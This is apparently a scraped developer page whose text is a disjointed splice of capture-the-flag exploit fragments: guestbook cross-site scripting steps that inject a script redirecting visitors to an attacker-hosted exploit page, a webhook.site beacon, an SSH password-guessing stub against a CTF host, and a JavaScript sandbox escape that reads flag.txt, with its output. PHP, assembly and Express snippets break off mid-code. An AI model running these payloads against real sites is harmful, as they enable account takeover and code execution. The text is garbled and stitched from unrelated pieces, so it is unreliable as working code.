st98 st98

I hereby claim:

To claim this, I am signing this object:

guestbook

Generate payload with gen_payload.php
Put exploit1.html, exploit2.html, and generated payload.bin on your Web server
Post </textarea><script nonce="script">if(location.href.indexOf(`web1.bingo`)===-1)location=`http://[IP address]/exploit1.html`</script><textarea>
Fix filename in exploit2.html from payload_0.6719151792598002.php to payload_(value shown in logs).php
Post ````

	<body>
	<style>
	iframe {
	width: 300px;
	height: 200px;
	}
	</style>
	<img src="http://httpstat.us/200?sleep=100000">
	<img src="https://webhook.site/...?start">
	<script>

	import paramiko
	from pwn import *

	context.log_level = 'error'

	def check(password):
	try:
	conn = ssh(host='fsociety-04.play.midnightsunctf.se', port=2222, user='elliot', password=password)
	conn.close()
	return True

	$ nc misc.2021.chall.actf.co 21705
	Welcome to CaaSio Snake Edition! Enter your calculation:
	[a='(async()=>{try{await import("")}catch(e){e[c]',b='p=process;p.stdout.write(p.mainModule.require',c='constructo'+'r']&&{[(a+='[c](b)()}})()')]:123,[b+='("fs").readFileSync("./flag.txt"))']:123,[a[c][c](a)()]:123}
	Result:
	{
	'(async()=>{try{await import("")}catch(e){e[c][c](b)()}})()': 123,
	'p=process;p.stdout.write(p.mainModule.require("fs").readFileSync("./flag.txt"))': 123,
	undefined: 123
	}
	Variables:

	<?php
	// utils
	function add(&$table, $k, $v) {
	if (array_key_exists($k, $table) && strlen($v) >= strlen($table[$k])) {
	return;
	}

	$table[$k] = $v;
	}

	BITS 64

	; ref: https://starfleetcadet75.github.io/posts/plaid-2020-golf-so/

	ehdr: ; Elf64_Ehdr
	db 0x7f, "ELF", 2, 1, 1, 0 ; e_ident
	times 8 db 0
	dw 3 ; e_type
	dw 0x3e ; e_machine
	dd 1 ; e_version

	const express = require('express');
	const dnsPacket = require('dns-packet');
	const app = express();
	const port = 8000;

	let len = 0x12;

	app.get('/updateLength', (req, res) => {
	len = parseInt(req.query.len, 10);
	console.log('updated:', len);